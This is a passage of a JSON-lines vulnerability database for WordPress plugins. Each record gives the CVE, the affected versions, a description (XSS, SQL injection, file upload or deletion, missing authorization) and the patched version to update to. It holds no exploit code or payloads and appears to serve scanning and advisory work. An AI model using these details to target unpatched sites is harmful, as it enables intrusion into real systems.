version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/Controller\\\/Table\\\/TransactionsTable.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FController%2FTable%2FTransactionsTable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/Controller\\\/Table\\\/TransactionsTable.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FController%2FTable%2FTransactionsTable.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b02b5ea6-e112-4255-833c-87ee939986b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b02b5ea6-e112-4255-833c-87ee939986b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11684","slug":"kudos-donations","versionImpact":"3.2.9","versionEndExcluding":"3.3.0","description":"The Kudos Donations \u2013 Easy donations and payments with Mollie plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-subscriptions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-subscriptions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-subscriptions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-subscriptions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-transactions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-transactions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-transactions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-transactions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f281c9a5-1663-4dca-968f-685d933f99b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f281c9a5-1663-4dca-968f-685d933f99b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9186","slug":"wp-marketing-automations","versionImpact":"3.2.2","versionEndExcluding":"3.3.0","description":"The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab29b59-7e87-4289-88dd-ed5520260c26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab29b59-7e87-4289-88dd-ed5520260c26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10091","slug":"elementskit-lite","versionImpact":"3.2.9","versionEndExcluding":"3.3.0","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Comparison Widget in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b278af-6ce6-4e70-a83a-a1b035542cd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b278af-6ce6-4e70-a83a-a1b035542cd4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.9\\\/widgets\\\/image-comparison\\\/image-comparison.php#L657\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.9\\\/widgets\\\/image-comparison\\\/image-comparison.php#L657\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0714","slug":"metform","versionImpact":"3.2.4","versionEndExcluding":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Arbitrary File Upload due to insufficient file type validation in versions up to, and including, 3.2.4. This allows unauthenticated visitors to perform a \"double extension\" attack and upload files containing a malicious extension but ending with a benign extension, which may make remote code execution possible in some configurations.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697ce433-f321-4977-a2ad-68369d9ce9c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697ce433-f321-4977-a2ad-68369d9ce9c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/file-data-validation.php?rev=2746287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/file-data-validation.php?rev=2746287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896914\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3915","slug":"aeropage-sync-for-airtable","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The Aeropage Sync for Airtable plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'aeropageDeletePost' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L475\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L476\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L476\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98aab54-877b-47df-9c8a-5e70ea985c1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98aab54-877b-47df-9c8a-5e70ea985c1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3914","slug":"aeropage-sync-for-airtable","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The Aeropage Sync for Airtable plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aeropage_media_downloader' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a501c2d6-cdcc-4003-99df-245f5253e20f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a501c2d6-cdcc-4003-99df-245f5253e20f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4305","slug":"login-as-customer-or-user","versionEndExcluding":"3.3","description":"The Login as User or Customer WordPress plugin before 3.3 lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/286d972d-7bda-455c-a226-fd9ce5f925bd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/286d972d-7bda-455c-a226-fd9ce5f925bd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4792","slug":"blog-designer-pack","versionEndExcluding":"3.3","description":"The News & Blog Designer Pack WordPress plugin before 3.3 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13304aca-0722-4bd9-b443-a5fed1ce22da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13304aca-0722-4bd9-b443-a5fed1ce22da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0262","slug":"wp-airbnb-review-slider","versionEndExcluding":"3.3","description":"The WP Airbnb Review Slider WordPress plugin before 3.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d8c28ac-a46c-45d3-acc9-2cd2e6356ba2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d8c28ac-a46c-45d3-acc9-2cd2e6356ba2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9292","slug":"bridge-core","versionImpact":"3.2.0","versionEndExcluding":"3.3","description":"The Bridge Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formforall' shortcode in versions up to, and including, 3.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1baa93da-9b55-45e7-b9a9-db331b5d0584?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1baa93da-9b55-45e7-b9a9-db331b5d0584?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3075","slug":"elementor","versionImpact":"3.29.0","versionEndExcluding":"3.29.1","description":"The Elementor Website Builder \u2013 More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elementor-element' shortcode in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts sites with 'Element Caching' enabled.","recommendation":"Update to version 3.29.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3302102%40elementor&new=3302102%40elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3302102%40elementor&new=3302102%40elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639693b6-369e-457e-a37e-30bdb8ea7275?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639693b6-369e-457e-a37e-30bdb8ea7275?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1473","slug":"ml-slider","versionEndExcluding":"3.29.1","description":"The Slider, Gallery, and Carousel by MetaSlider WordPress plugin 3.29.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6e6c67b-7d9b-4fdb-8115-c33add7bfc3d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6e6c67b-7d9b-4fdb-8115-c33add7bfc3d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3076","slug":"elementor-pro","versionImpact":"3.29.0","versionEndExcluding":"3.29.1","description":"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_text\u2019 parameter in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.29.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/elementor.com\\\/pro\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/elementor.com\\\/pro\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c796ee7-5394-40f3-9158-1a006efbf085?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c796ee7-5394-40f3-9158-1a006efbf085?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2302","slug":"advanced-woo-search","versionImpact":"3.28","versionEndExcluding":"3.29","description":"The Advanced Woo Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aws_search_terms shortcode in all versions up to, and including, 3.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8fca84-3ea1-432f-8cfe-9a1d1f70fa6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8fca84-3ea1-432f-8cfe-9a1d1f70fa6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8357","slug":"media-library-assistant","versionImpact":"3.27","versionEndExcluding":"3.28","description":"The Media Library Assistant plugin for WordPress is vulnerable to arbitrary file deletion in the \/wp-content\/uploads directory due to insufficient file path validation and user capability checking in the _process_mla_download_file function in all versions up to, and including, 3.27. This makes it possible for authenticated attackers, with Author-level access and above, to delete arbitrary files on the server from the \/wp-content\/uploads\/ directory.","recommendation":"Update to version 3.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-main.php#L924\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-main.php#L924\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336915%40media-library-assistant&new=3336915%40media-library-assistant&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336915%40media-library-assistant&new=3336915%40media-library-assistant&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8726375f-de67-4c92-9cf8-1bfb7330f327?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8726375f-de67-4c92-9cf8-1bfb7330f327?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13445","slug":"elementor","versionImpact":"3.27.4","versionEndExcluding":"3.27.5","description":"The Elementor Website Builder \u2013 More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the border, margin and gap parameters in all versions up to, and including, 3.27.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.27.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3241278%40elementor%2Ftrunk&old=3239949%40elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3241278%40elementor%2Ftrunk&old=3239949%40elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a11e702-34d2-49ee-8762-cc3614a7950a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a11e702-34d2-49ee-8762-cc3614a7950a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7035","slug":"media-library-assistant","versionImpact":"3.26","versionEndExcluding":"3.27","description":"The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mla_tag_cloud and mla_term_list shortcodes in all versions up to, and including, 3.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-tag-cloud.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-tag-cloud.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-term-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-term-list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3327861\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3327861\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e02a2b-9033-4022-a7d7-1c81a7f02f83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e02a2b-9033-4022-a7d7-1c81a7f02f83?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8236","slug":"elementor","versionImpact":"3.25.7","versionEndExcluding":"3.25.8","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter of the Icon widget in all versions up to, and including, 3.25.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.25.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.4\\\/includes\\\/widgets\\\/icon.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.4\\\/includes\\\/widgets\\\/icon.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192020\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192020\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1305be5-8267-475f-b962-62e3930116e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1305be5-8267-475f-b962-62e3930116e1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11722","slug":"acf-frontend-form-element","versionImpact":"3.25.1","versionEndExcluding":"3.25.2","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.25.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This requires an unauthenticated user to have been given permission to view form submissions, and the form submission shortcode be added to a page.","recommendation":"Update to version 3.25.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/admin\\\/admin-pages\\\/submissions\\\/crud.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/admin\\\/admin-pages\\\/submissions\\\/crud.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209204%40acf-frontend-form-element&new=3209204%40acf-frontend-form-element&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209204%40acf-frontend-form-element&new=3209204%40acf-frontend-form-element&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97cef309-da2f-461a-b5a3-3a85c540c7aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97cef309-da2f-461a-b5a3-3a85c540c7aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8494","slug":"elementor-pro","versionImpact":"3.25.10","versionEndExcluding":"3.25.11","description":"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.25.10 via the 'elementor-template' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the content of Private, Pending, and Draft Templates. The vulnerability was partially patched in version 3.24.4.","recommendation":"Update to version 3.25.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/elementor.com\\\/\",\"name\":\"https:\\\/\\\/elementor.com\\\/\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ada60f-1e20-454e-a9d7-7849be764d81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ada60f-1e20-454e-a9d7-7849be764d81?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-10453","slug":"elementor","versionImpact":"3.25.9","versionEndExcluding":"3.25.10","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typography Settings in all versions up to, and including, 3.25.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.25.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.25.9\\\/assets\\\/js\\\/editor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.25.9\\\/assets\\\/js\\\/editor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f23604b7-5a7f-4be7-bc73-cb4facdd1e73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f23604b7-5a7f-4be7-bc73-cb4facdd1e73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
